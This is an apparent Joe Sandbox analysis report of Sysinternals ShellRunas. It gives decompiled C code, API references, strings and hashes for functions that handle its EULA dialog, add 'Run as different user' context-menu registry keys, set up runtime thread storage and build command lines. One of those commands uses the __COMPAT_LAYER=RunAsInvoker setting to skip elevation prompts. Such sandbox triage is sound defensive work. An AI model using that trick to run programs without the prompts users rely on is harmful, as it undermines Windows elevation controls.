			E00401470(char _a4) {
				int _v0;
				signed int _v4;
				short _v524;
				int _v528;
				void* _v532;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t76;
				signed short* _t89;
				signed short* _t90;
				signed int _t92;
				short* _t93;
				short* _t94;
				void* _t95;
				signed int _t98;
				short* _t99;
				short* _t100;
				void* _t101;
				signed int _t104;
				short* _t105;
				short* _t106;
				void* _t107;
				signed int _t110;
				short* _t111;
				short* _t112;
				void* _t113;
				signed int _t116;
				signed short* _t117;
				signed short* _t118;
				void* _t123;
				signed int _t129;
				signed int _t130;
				signed short* _t131;
				signed short* _t133;
				signed short* _t134;
				signed short* _t135;
				void* _t137;
				signed int _t138;
				void* _t143;
				void* _t145;
				void* _t147;
				void* _t149;
				void* _t151;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t157;
				int* _t158;
				int* _t159;
				int* _t160;
				int* _t161;
				int* _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				void* _t169;
				void* _t170;
				void* _t171;
				int _t172;
				signed int _t175;
				signed int _t176;

				_t175 =  &_v532;
				_t76 =  *0x413004; // 0xf284055d
				_v4 = _t76 ^ _t175;
				_t172 = 0;
				_v532 = 0;
				E00403227(_t170,  &_v524, L"Software\\Sysinternals\\%s", L"ShellRunas - Sysinternals: www.sysinternals.com");
				_t176 = _t175 + 0xc;
				if(RegCreateKeyW(0x80000001,  &_v524,  &_v532) == 0) {
					_v528 = 4;
					RegQueryValueExW(_v532, L"EulaAccepted", 0, 0,  &_a4,  &_v528);
				}
				if(_a4 != _t172) {
					L20:
					RegSetValueExW(_v532, L"EulaAccepted", _t172, 4,  &_a4, 4);
				} else {
					_push(_t170);
					_push(_t157);
					_t171 = LocalAlloc(0x40, 0x3e8);
					_t11 = _t171 + 0x12; // 0x12
					_t158 = _t11;
					LoadLibraryW(L"Riched32.dll");
					 *_t171 = 0x80c808d0;
					 *(_t171 + 0xa) = _t172;
					 *(_t171 + 0xc) = _t172;
					 *((short*)(_t171 + 0xe)) = 0x138;
					 *((short*)(_t171 + 0x10)) = 0xb4;
					 *(_t171 + 8) = _t172;
					 *_t158 = _t172;
					_t159 =  &(_t158[0]);
					 *_t159 = _t172;
					_t160 =  &(_t159[0]);
					_t89 = L"License Agreement";
					_t143 = _t160 - _t89;
					do {
						_t129 =  *_t89 & 0x0000ffff;
						 *(_t143 + _t89) = _t129;
						_t89 =  &(_t89[1]);
					} while (_t129 != _t172);
					_t161 =  &(_t160[9]);
					 *_t161 = 8;
					_t162 =  &(_t161[0]);
					_t90 = L"MS Shell Dlg";
					_t145 = _t162 - _t90;
					do {
						_t130 =  *_t90 & 0x0000ffff;
						 *(_t145 + _t90) = _t130;
						_t90 =  &(_t90[1]);
					} while (_t130 != _t172);
					_t19 =  &(_t162[7]); // 0x5
					_t92 = _t19 & 0xfffffffc;
					 *((short*)(_t92 + 8)) = 7;
					 *((short*)(_t92 + 0xa)) = 3;
					 *((short*)(_t92 + 0xc)) = 0x12a;
					 *((short*)(_t92 + 0x10)) = 0x1f6;
					 *_t92 = 0x50000000;
					_push(_t123);
					 *((short*)(_t92 + 0xe)) = 0xe;
					_t93 = _t92 + 0x12;
					 *_t93 = 0xffff;
					_t94 = _t93 + 2;
					 *_t94 = 0x82;
					_t95 = _t94 + 2;
					_t131 = L"You can also use the /accepteula command-line switch to accept the EULA.";
					_t147 = _t95 - _t131;
					do {
						_t163 =  *_t131 & 0x0000ffff;
						 *(_t147 + _t131) = _t163;
						_t131 =  &(_t131[1]);
					} while (_t163 != _t172);
					 *(_t95 + 0x92) = _t172;
					_t98 = _t95 + 0x97 & 0xfffffffc;
					 *(_t171 + 8) =  *(_t171 + 8) + 1;
					 *((short*)(_t98 + 0x10)) = 1;
					 *((short*)(_t98 + 8)) = 0xc9;
					 *((short*)(_t98 + 0xa)) = 0x9f;
					 *((short*)(_t98 + 0xe)) = 0xe;
					 *_t98 = 0x50010000;
					 *((short*)(_t98 + 0xc)) = 0x32;
					_t99 = _t98 + 0x12;
					 *_t99 = 0xffff;
					_t100 = _t99 + 2;
					 *_t100 = 0x80;
					_t101 = _t100 + 2;
					_t133 = L"&Agree";
					_t149 = _t101 - _t133;
					do {
						_t164 =  *_t133 & 0x0000ffff;
						 *(_t149 + _t133) = _t164;
						_t133 =  &(_t133[1]);
					} while (_t164 != 0);
					 *(_t101 + 0xe) = _t164;
					 *(_t171 + 8) =  *(_t171 + 8) + 1;
					_t104 = _t101 + 0x13 & 0xfffffffc;
					 *((short*)(_t104 + 8)) = 0xff;
					 *((short*)(_t104 + 0xa)) = 0x9f;
					 *((short*)(_t104 + 0xc)) = 0x32;
					 *((short*)(_t104 + 0xe)) = 0xe;
					 *((short*)(_t104 + 0x10)) = 2;
					 *_t104 = 0x50010000;
					_t105 = _t104 + 0x12;
					 *_t105 = 0xffff;
					_t106 = _t105 + 2;
					 *_t106 = 0x80;
					_t107 = _t106 + 2;
					_t134 = L"&Decline";
					_t151 = _t107 - _t134;
					do {
						_t165 =  *_t134 & 0x0000ffff;
						 *(_t151 + _t134) = _t165;
						_t134 =  &(_t134[1]);
					} while (_t165 != 0);
					 *(_t107 + 0x12) = _t165;
					 *(_t171 + 8) =  *(_t171 + 8) + 1;
					_t110 = _t107 + 0x17 & 0xfffffffc;
					 *((short*)(_t110 + 8)) = 7;
					 *((short*)(_t110 + 0xa)) = 0x9f;
					 *((short*)(_t110 + 0xc)) = 0x32;
					 *((short*)(_t110 + 0xe)) = 0xe;
					 *((short*)(_t110 + 0x10)) = 0x1f5;
					 *_t110 = 0x50010000;
					_t111 = _t110 + 0x12;
					 *_t111 = 0xffff;
					_t112 = _t111 + 2;
					 *_t112 = 0x80;
					_t113 = _t112 + 2;
					_t135 = L"&Print";
					_t153 = _t113 - _t135;
					do {
						_t166 =  *_t135 & 0x0000ffff;
						 *(_t153 + _t135) = _t166;
						_t135 =  &(_t135[1]);
					} while (_t166 != 0);
					 *(_t113 + 0xe) = _t166;
					_t116 = _t113 + 0x13 & 0xfffffffc;
					 *(_t171 + 8) =  *(_t171 + 8) + 1;
					_t56 = _t116 + 0x12; // -249
					_t154 = _t56;
					 *((short*)(_t116 + 0xa)) = 0xe;
					 *((short*)(_t116 + 8)) = 7;
					 *((short*)(_t116 + 0xc)) = 0x12a;
					 *((short*)(_t116 + 0xe)) = 0x8c;
					 *((short*)(_t116 + 0x10)) = 0x1f4;
					 *_t116 = 0x50a11844;
					_t117 = L"RICHEDIT";
					_t137 = _t154 - _t117;
					_pop(_t123);
					do {
						_t167 =  *_t117 & 0x0000ffff;
						 *(_t137 + _t117) = _t167;
						_t117 =  &(_t117[1]);
					} while (_t167 != 0);
					_t155 = _t154 + 0x12;
					_t118 = L"&Decline";
					_t169 = _t155 - _t118;
					do {
						_t138 =  *_t118 & 0x0000ffff;
						 *(_t169 + _t118) = _t138;
						_t118 =  &(_t118[1]);
					} while (_t138 != 0);
					 *(_t155 + 0x12) = _t138;
					 *(_t171 + 8) =  *(_t171 + 8) + 1;
					_v0 = DialogBoxIndirectParamW(0, _t171, 0, E00401310, L"ShellRunas - Sysinternals: www.sysinternals.com");
					LocalFree(_t171);
					_t172 = 0;
					_pop(_t157);
					_pop(_t170);
					if(_v0 != 0) {
						goto L20;
					}
				}
				RegCloseKey(_v532);
				return E0040318A(0 | _a4 != _t172, _t123, _v4 ^ _t176, _v532, _t157, _t170);
			}

0x00401470
0x00401476
0x0040147d
0x00401493
0x00401496
0x0040149a
0x0040149f
0x004014b9
0x004014d4
0x004014dc
0x004014dc
0x004014e9
0x004017a7
0x004017be
0x004014ef
0x004014ef
0x004014f0
0x004014fe
0x00401505
0x00401505
0x00401508
0x0040150e
0x00401514
0x00401518
0x0040151c
0x00401522
0x00401528
0x0040152c
0x0040152f
0x00401532
0x00401535
0x00401538
0x0040153f
0x00401541
0x00401541
0x00401544
0x00401548
0x0040154b
0x00401550
0x00401553
0x00401558
0x0040155b
0x00401562
0x00401564
0x00401564
0x00401567
0x0040156b
0x0040156e
0x00401573
0x00401576
0x00401579
0x0040157f
0x00401585
0x0040158b
0x00401591
0x00401597
0x0040159d
0x004015a1
0x004015a4
0x004015a9
0x004015ac
0x004015b1
0x004015b4
0x004015bb
0x004015c0
0x004015c0
0x004015c3
0x004015c7
0x004015ca
0x004015cf
0x004015de
0x004015e6
0x004015ea
0x004015ee
0x004015f4
0x004015fa
0x004015fe
0x00401609
0x0040160d
0x00401610
0x00401615
0x00401618
0x0040161d
0x00401620
0x00401627
0x00401630
0x00401630
0x00401633
0x00401637
0x0040163a
0x0040163f
0x00401643
0x0040164d
0x00401650
0x00401656
0x0040165c
0x00401660
0x00401664
0x0040166a
0x00401670
0x00401673
0x00401678
0x0040167b
0x00401680
0x00401683
0x0040168a
0x00401690
0x00401690
0x00401693
0x00401697
0x0040169a
0x0040169f
0x004016a3
0x004016ae
0x004016b1
0x004016b7
0x004016bd
0x004016c1
0x004016c5
0x004016cb
0x004016d1
0x004016d4
0x004016d9
0x004016dc
0x004016e1
0x004016e4
0x004016eb
0x004016f0
0x004016f0
0x004016f3
0x004016f7
0x004016fa
0x004016ff
0x00401708
0x00401710
0x00401714
0x00401714
0x00401717
0x0040171b
0x00401721
0x00401727
0x0040172d
0x00401733
0x00401739
0x00401740
0x00401742
0x00401743
0x00401743
0x00401746
0x0040174a
0x0040174d
0x00401752
0x00401755
0x0040175c
0x00401760
0x00401760
0x00401763
0x00401767
0x0040176a
0x0040177c
0x00401780
0x0040178d
0x00401794
0x0040179a
0x004017a3
0x004017a4
0x004017a5
0x00000000
0x00000000
0x004017a5
0x004017c9
0x004017f0

APIs

__swprintf.LIBCMT ref: 0040149A
RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 004014B1
RegQueryValueExW.ADVAPI32 ref: 004014DC
LocalAlloc.KERNEL32(00000040,000003E8,?,?,?,?,00000000), ref: 004014F8
LoadLibraryW.KERNEL32(Riched32.dll,?,?,?,00000000), ref: 00401508
DialogBoxIndirectParamW.USER32 ref: 00401786
LocalFree.KERNEL32(00000000,?,?,?,00000000), ref: 00401794
RegSetValueExW.ADVAPI32(?,EulaAccepted,00000000,00000004,?,00000004,?,?,00000000), ref: 004017BE
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004017C9

Strings

Software\Sysinternals\%s, xrefs: 0040148E
EulaAccepted, xrefs: 004014CE, 004017B8
MS Shell Dlg, xrefs: 0040155B
&Print, xrefs: 004016E4
&Agree, xrefs: 00401620
ShellRunas - Sysinternals: www.sysinternals.com, xrefs: 00401485, 0040176F
Riched32.dll, xrefs: 00401500
License Agreement, xrefs: 00401538
RICHEDIT, xrefs: 00401739
&Decline, xrefs: 00401683, 00401755
You can also use the /accepteula command-line switch to accept the EULA., xrefs: 004015B4

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: LocalValue$AllocCloseCreateDialogFreeIndirectLibraryLoadParamQuery__swprintf
String ID: &Agree$&Decline$&Print$EulaAccepted$License Agreement$MS Shell Dlg$RICHEDIT$Riched32.dll$ShellRunas - Sysinternals: www.sysinternals.com$Software\Sysinternals\%s$You can also use the /accepteula command-line switch to accept the EULA.
API String ID: 1839599301-707968945
Opcode ID: f4e69aa77bff61b704e8fbccd0d93f2c3052f5bef0e29b2b67b4d8038d72d3e8
Instruction ID: 154b2d0257e82f6b0cd4e7c6326ce2309e60fd29fcbd71df3831e51aaf4186b5
Opcode Fuzzy Hash: f4e69aa77bff61b704e8fbccd0d93f2c3052f5bef0e29b2b67b4d8038d72d3e8
Instruction Fuzzy Hash: C7919CB29603008BC3218F24C81AB92B3B0FF95314F5A955DE5899F3B2F7B8C585C75A

Uniqueness

Uniqueness Score: -1.00%

Function 004019F0 Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 153
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E004019F0(void* __ebx, int __ecx, short* _a4) {
				signed int _v4;
				short _v1044;
				short _v1564;
				void* _v1568;
				void* _v1572;
				void* _v1576;
				void* _v1580;
				void* _v1584;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t28;
				int _t31;
				short* _t38;
				int* _t39;
				struct HINSTANCE__* _t43;
				intOrPtr* _t48;
				void* _t55;
				intOrPtr _t64;
				void* _t75;
				void* _t77;
				int _t78;
				signed int _t82;

				_t55 = __ebx;
				_t82 =  &_v1584;
				_t28 =  *0x413004; // 0xf284055d
				_v4 = _t28 ^ _t82;
				_t77 = RegCreateKeyExW;
				_t78 = __ecx;
				_t31 = RegCreateKeyExW(0x80000001, _a4, 0, 0, 0, 4, 0,  &_v1576, 0);
				if(_t31 == 0) {
					_t78 = RegCreateKeyExW(_v1576, _t78, _t31, _t31, _t31, 4, _t31,  &_v1584, _t31);
					if(_t78 == 0) {
						_t78 = RegCreateKeyExW(_v1584, L"Shell", 0, 0, 0, 4, 0,  &_v1572, 0);
						if(_t78 == 0) {
							_t38 = L"Run as different user (netonly)...";
							if(__ebx == 0) {
								_t38 = L"Run as different user...";
							}
							_t39 = RegCreateKeyExW(_v1572, _t38, 0, 0, 0, 4, 0,  &_v1568, 0);
							_t78 = _t39;
							if(_t78 == 0) {
								_t43 = RegCreateKeyExW(_v1568, L"Command", _t78, _t78, _t78, 6, _t78,  &_v1580, _t39);
								_t78 = _t43;
								if(_t78 == 0) {
									GetModuleFileNameW(_t43,  &_v1564, 0x104);
									if(_t55 == 0) {
										_push( &_v1564);
										_push(L"\"%s\" \"%%1\" %%*");
										_push(0x208);
										_push( &_v1044);
									} else {
										_push( &_v1564);
										_push(L"\"%s\" /netonly \"%%1\" %%*");
										_push(0x208);
										_push( &_v1044);
									}
									E004032BD();
									_t48 =  &_v1044;
									_t82 = _t82 + 0x10;
									_t75 = _t48 + 2;
									do {
										_t64 =  *_t48;
										_t48 = _t48 + 2;
									} while (_t64 != 0);
									_t78 = RegSetValueW(_v1580, 0, 1,  &_v1044, (_t48 - _t75 >> 1) + (_t48 - _t75 >> 1));
									RegCloseKey(_v1580);
								}
								RegCloseKey(_v1568);
							}
							RegCloseKey(_v1572);
						}
						RegCloseKey(_v1584);
					}
					_t68 = _v1576;
					RegCloseKey(_v1576);
					_t31 = _t78;
				}
				return E0040318A(_t31, _t55, _v4 ^ _t82, _t68, _t77, _t78);
			}

0x004019f0
0x004019f0
0x004019f6
0x004019fd
0x00401a0d
0x00401a15
0x00401a2c
0x00401a30
0x00401a51
0x00401a55
0x00401a78
0x00401a7c
0x00401a84
0x00401a89
0x00401a8b
0x00401a8b
0x00401aa7
0x00401aa9
0x00401aad
0x00401ac9
0x00401acb
0x00401acf
0x00401ae0
0x00401ae8
0x00401b07
0x00401b08
0x00401b0d
0x00401b19
0x00401aea
0x00401aee
0x00401aef
0x00401af4
0x00401b00
0x00401b00
0x00401b1a
0x00401b1f
0x00401b26
0x00401b29
0x00401b30
0x00401b30
0x00401b33
0x00401b36
0x00401b5f
0x00401b61
0x00401b61
0x00401b68
0x00401b68
0x00401b6f
0x00401b6f
0x00401b76
0x00401b76
0x00401b78
0x00401b7d
0x00401b7f
0x00401b81
0x00401b98

APIs

RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000004,00000000,?,00000000,?), ref: 00401A2C
RegCreateKeyExW.ADVAPI32(?,.exe,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A49
RegCreateKeyExW.ADVAPI32(?,Shell,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A76
RegCreateKeyExW.ADVAPI32(?,Run as different user (netonly)...,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401AA7
RegCreateKeyExW.ADVAPI32(?,Command,00000000,00000000,00000000,00000006,00000000,?,00000000), ref: 00401AC9
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401AE0
_swprintf.LIBCMT ref: 00401B1A
RegSetValueW.ADVAPI32(?,00000000,00000001,?), ref: 00401B54
RegCloseKey.ADVAPI32(?), ref: 00401B61
RegCloseKey.ADVAPI32(?), ref: 00401B68
RegCloseKey.ADVAPI32(?), ref: 00401B6F
RegCloseKey.ADVAPI32(?), ref: 00401B76
RegCloseKey.ADVAPI32(?), ref: 00401B7D

Strings

Command, xrefs: 00401AC3
Shell, xrefs: 00401A70
Run as different user..., xrefs: 00401A8B, 00401AA5
.exe, xrefs: 00401A47
"%s" "%%1" %%*, xrefs: 00401B08
"%s" /netonly "%%1" %%*, xrefs: 00401AEF
Run as different user (netonly)..., xrefs: 00401A84

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: CloseCreate$FileModuleNameValue_swprintf
String ID: "%s" "%%1" %%*$"%s" /netonly "%%1" %%*$.exe$Command$Run as different user (netonly)...$Run as different user...$Shell
API String ID: 2816765105-3583415818
Opcode ID: fd094dcd363d27c0bf250ac2475080b10ccc28c413ec764f82221b39573ebeb1
Instruction ID: 96684db5b3ddf41ef19364bd1cce9cce62b50f6402ace901a6fc09d749ff9c79
Opcode Fuzzy Hash: fd094dcd363d27c0bf250ac2475080b10ccc28c413ec764f82221b39573ebeb1
Instruction Fuzzy Hash: 6A416E726443017BE320DB64CC46FABB7ACABC8B54F40491DB744AB2D0DAB4F90487A9

Uniqueness

Uniqueness Score: -1.00%

Function 00406798 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00406798(void* __ebx, void* __edx, void* __fp0) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				intOrPtr* _t23;
				long _t26;
				void* _t34;
				void* _t37;
				struct HINSTANCE__* _t38;
				void* _t41;
				void* _t43;
				void* _t48;

				_t48 = __fp0;
				_t37 = __edx;
				_t30 = __ebx;
				_t38 = GetModuleHandleA("KERNEL32.DLL");
				if(_t38 != 0) {
					 *0x4144f0 = GetProcAddress(_t38, "FlsAlloc");
					 *0x4144f4 = GetProcAddress(_t38, "FlsGetValue");
					 *0x4144f8 = GetProcAddress(_t38, "FlsSetValue");
					_t7 = GetProcAddress(_t38, "FlsFree");
					__eflags =  *0x4144f0;
					_t41 = TlsSetValue;
					 *0x4144fc = _t7;
					if( *0x4144f0 == 0) {
						L6:
						 *0x4144f4 = TlsGetValue;
						 *0x4144f0 = E004064B1;
						 *0x4144f8 = _t41;
						 *0x4144fc = TlsFree;
					} else {
						__eflags =  *0x4144f4;
						if( *0x4144f4 == 0) {
							goto L6;
						} else {
							__eflags =  *0x4144f8;
							if( *0x4144f8 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x4138c4 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x4144f4);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E00406C99();
							 *0x4144f0 = E004063CC( *0x4144f0);
							 *0x4144f4 = E004063CC( *0x4144f4);
							 *0x4144f8 = E004063CC( *0x4144f8);
							 *0x4144fc = E004063CC( *0x4144fc);
							_t18 = E00403DE2(_t30, _t38);
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E004064EC(_t30, _t38);
								goto L15;
							} else {
								_push(E00406677);
								_t21 =  *((intOrPtr*)(E00406443( *0x4144f0)))();
								__eflags = _t21 - 0xffffffff;
								 *0x4138c0 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t43 = E00407C87(1, 0x214);
									__eflags = _t43;
									if(_t43 == 0) {
										goto L14;
									} else {
										_push(_t43);
										_push( *0x4138c0);
										_t23 = E00406443( *0x4144f8);
										_pop(_t34);
										__eflags =  *_t23();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t43);
											E00406529(_t30, _t34, _t37, _t38, _t43, __eflags, _t48);
											_t26 = GetCurrentThreadId();
											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
											 *_t43 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E004064EC(__ebx, _t38);
					return 0;
				}
			}

0x00406798
0x00406798
0x00406798
0x004067a4
0x004067a8
0x004067c8
0x004067d5
0x004067e2
0x004067e7
0x004067e9
0x004067f0
0x004067f6
0x004067fb
0x00406813
0x00406818
0x00406822
0x0040682c
0x00406832
0x004067fd
0x004067fd
0x00406804
0x00000000
0x00406806
0x00406806
0x0040680d
0x00000000
0x0040680f
0x0040680f
0x00406811
0x00000000
0x00000000
0x00406811
0x0040680d
0x00406804
0x00406837
0x0040683d
0x00406840
0x00406845
0x00406917
0x00406917
0x00406917
0x0040684b
0x00406852
0x00406854
0x00406856
0x00000000
0x0040685c
0x0040685c
0x00406872
0x00406882
0x00406892
0x0040689f
0x004068a4
0x004068a9
0x004068ab
0x00406912
0x00406912
0x00000000
0x004068ad
0x004068ad
0x004068be
0x004068c0
0x004068c3
0x004068c8
0x00000000
0x004068ca
0x004068d6
0x004068d8
0x004068dc
0x00000000
0x004068de
0x004068de
0x004068df
0x004068eb
0x004068f0
0x004068f3
0x004068f5
0x00000000
0x004068f7
0x004068f7
0x004068f9
0x004068fa
0x00406901
0x00406907
0x0040690b
0x0040690f
0x0040690f
0x004068f5
0x004068dc
0x004068c8
0x004068ab
0x00406856
0x0040691b
0x004067aa
0x004067aa
0x004067b2
0x004067b2

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00403AA8), ref: 0040679E
__mtterm.LIBCMT ref: 004067AA

Part of subcall function 004064EC: TlsFree.KERNEL32(FFFFFFFF,00406917), ref: 00406517

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004067C0
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004067CD
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004067DA
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004067E7
TlsAlloc.KERNEL32 ref: 00406837
TlsSetValue.KERNEL32(00000000), ref: 00406852
__init_pointers.LIBCMT ref: 0040685C
__calloc_crt.LIBCMT ref: 004068D1
GetCurrentThreadId.KERNEL32 ref: 00406901

Strings

FlsAlloc, xrefs: 004067BA
FlsSetValue, xrefs: 004067CF
KERNEL32.DLL, xrefs: 00406799
FlsFree, xrefs: 004067DC
FlsGetValue, xrefs: 004067C2

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 630932248-3819984048
Opcode ID: 59697e22f0d555e3b7d3cb8a22637ef6e66e256eaa5b52333f5b32bc99484974
Instruction ID: 7c5ed862ad4e46ccbc4200316f1e50c4686e51c2e14fc2ae8d4e83c3db53f4cc
Opcode Fuzzy Hash: 59697e22f0d555e3b7d3cb8a22637ef6e66e256eaa5b52333f5b32bc99484974
Instruction Fuzzy Hash: 023166B19003129AD7107FB9BD05B863AA4ABC0724B12853BF821BB2F1DB399554CF7D

Uniqueness

Uniqueness Score: -1.00%

Function 00402F60 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 160
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00402F60(void* __ebx, intOrPtr __ecx, WCHAR* __edx, void* __eflags, void* __fp0) {
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				intOrPtr* _t45;
				void* _t53;
				intOrPtr* _t68;
				void* _t71;
				void* _t73;
				signed int _t74;
				intOrPtr _t85;
				intOrPtr _t88;
				void* _t89;
				short* _t90;
				void* _t91;
				void* _t92;
				void* _t93;
				WCHAR* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				intOrPtr _t101;
				signed int _t102;
				signed int _t105;
				signed int _t106;
				void* _t107;
				signed int _t108;

				_t71 = __ebx;
				_t39 =  *0x413004; // 0xf284055d
				 *(_t105 + 0x628) = _t39 ^ _t105;
				_t101 =  *((intOrPtr*)(_t105 + 0x634));
				_push(_t89);
				_t95 = __edx;
				 *((intOrPtr*)(_t105 + 0x24)) = _t101;
				 *((intOrPtr*)(_t105 + 0x20)) =  *((intOrPtr*)(_t105 + 0x638));
				 *((intOrPtr*)(_t105 + 0x1c)) = __ecx;
				 *((short*)(_t105 + 0x28)) = 0;
				E00409280(_t89, _t105 + 0x22, 0, 0x206);
				_t106 = _t105 + 0xc;
				 *((char*)(_t106 + 0x1b)) = 0;
				GetShortPathNameW(_t95, _t106 + 0x20, 0x104);
				_t45 = _t106 + 0x1c;
				_t73 = _t45 + 2;
				do {
					_t85 =  *_t45;
					_t45 = _t45 + 2;
				} while (_t85 != 0);
				_t74 = 2;
				_t96 = (_t45 - _t73 >> 1) + 1;
				if(__ebx > 2) {
					do {
						_t68 =  *((intOrPtr*)(_t101 + _t74 * 4));
						_t93 = _t68 + 2;
						do {
							_t88 =  *_t68;
							_t68 = _t68 + 2;
						} while (_t88 != 0);
						_t74 = _t74 + 1;
						_t96 = _t96 + (_t68 - _t93 >> 1) + 1;
					} while (_t74 < _t71);
				}
				GetModuleFileNameW(0, _t106 + 0x228, 0x104);
				_t86 = _t106 + 0x430;
				GetShortPathNameW(_t106 + 0x22c, _t106 + 0x430, 0x104);
				if( *((char*)(_t106 + 0x640)) == 0) {
					_t97 = _t96 + 0x14;
				} else {
					_t97 = _t96 + 0x30;
				}
				_t90 = LocalAlloc(0, _t97 + _t97);
				if(_t90 != 0) {
					_t87 = _t106 + 0x1c;
					 *_t90 = 0;
					E00403926(_t106 + 0x1c, 0x104);
					_t107 = _t106 + 8;
					if( *((char*)(_t107 + 0x640)) == 0) {
						_t53 = E0040360D(_t107 + 0x1c, L".msc");
						_t107 = _t107 + 8;
						if(_t53 != 0) {
							E004036E5(_t90, _t97, L"cmd.exe /c \"start ");
							_t87 =  *((intOrPtr*)(_t107 + 0x1c));
							 *((char*)( *((intOrPtr*)(_t107 + 0x1c)))) = 1;
							goto L16;
						}
					} else {
						E004036E5(_t90, _t97, L"cmd.exe /c \"set __COMPAT_LAYER=RunAsInvoker &&");
						 *((char*)( *((intOrPtr*)(_t107 + 0x1c)))) = 1;
						L16:
						 *((char*)(_t107 + 0x1b)) = 1;
						_t107 = _t107 + 0xc;
					}
					E0040366B(_t90, _t97, _t107 + 0x1c);
					E0040366B(_t90, _t97, 0x4118f0);
					_t102 = 2;
					_t108 = _t107 + 0x18;
					if(_t71 > 2) {
						do {
							_t87 =  *((intOrPtr*)( *(_t108 + 0x18) + _t102 * 4));
							E0040366B(_t90, _t97,  *((intOrPtr*)( *(_t108 + 0x18) + _t102 * 4)));
							E0040366B(_t90, _t97, 0x4118f0);
							_t102 = _t102 + 1;
							_t108 = _t108 + 0x18;
						} while (_t102 < _t71);
					}
					if( *((char*)(_t108 + 0xf)) != 0) {
						E0040366B(_t90, _t97, 0x4118f4);
						_t108 = _t108 + 0xc;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x14)))) = _t90;
					_pop(_t91);
					_pop(_t98);
					return E0040318A(0, _t71,  *(_t108 + 0x634) ^ _t108, _t87, _t91, _t98);
				} else {
					_t24 = _t90 + 8; // 0x8
					_pop(_t92);
					_pop(_t99);
					return E0040318A(_t24, _t71,  *(_t106 + 0x628) ^ _t106, _t86, _t92, _t99);
				}
			}

0x00402f60
0x00402f66
0x00402f6d
0x00402f7c
0x00402f84
0x00402f8a
0x00402f93
0x00402f97
0x00402f9b
0x00402f9f
0x00402fa6
0x00402fab
0x00402fb9
0x00402fbe
0x00402fc4
0x00402fc8
0x00402fd0
0x00402fd0
0x00402fd3
0x00402fd6
0x00402fdf
0x00402fe6
0x00402fe9
0x00402ff0
0x00402ff0
0x00402ff4
0x00402ff7
0x00402ff7
0x00402ffa
0x00402ffd
0x00403006
0x0040300b
0x0040300b
0x00402ff0
0x00403020
0x0040302b
0x0040303b
0x00403049
0x00403050
0x0040304b
0x0040304b
0x0040304b
0x0040305f
0x00403063
0x00403080
0x0040308a
0x0040308f
0x00403094
0x0040309f
0x004030c0
0x004030c5
0x004030ca
0x004030d3
0x004030d8
0x004030dc
0x00000000
0x004030dc
0x004030a1
0x004030a8
0x004030b1
0x004030df
0x004030df
0x004030e4
0x004030e4
0x004030ee
0x004030fa
0x004030ff
0x00403104
0x00403109
0x00403110
0x00403114
0x0040311a
0x00403126
0x0040312b
0x0040312e
0x00403131
0x00403110
0x0040313a
0x00403143
0x00403148
0x00403148
0x00403156
0x00403158
0x00403159
0x0040316a
0x00403065
0x00403065
0x00403068
0x00403069
0x0040307f
0x0040307f

APIs

_memset.LIBCMT ref: 00402FA6
GetShortPathNameW.KERNEL32 ref: 00402FBE
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403020
GetShortPathNameW.KERNEL32 ref: 0040303B
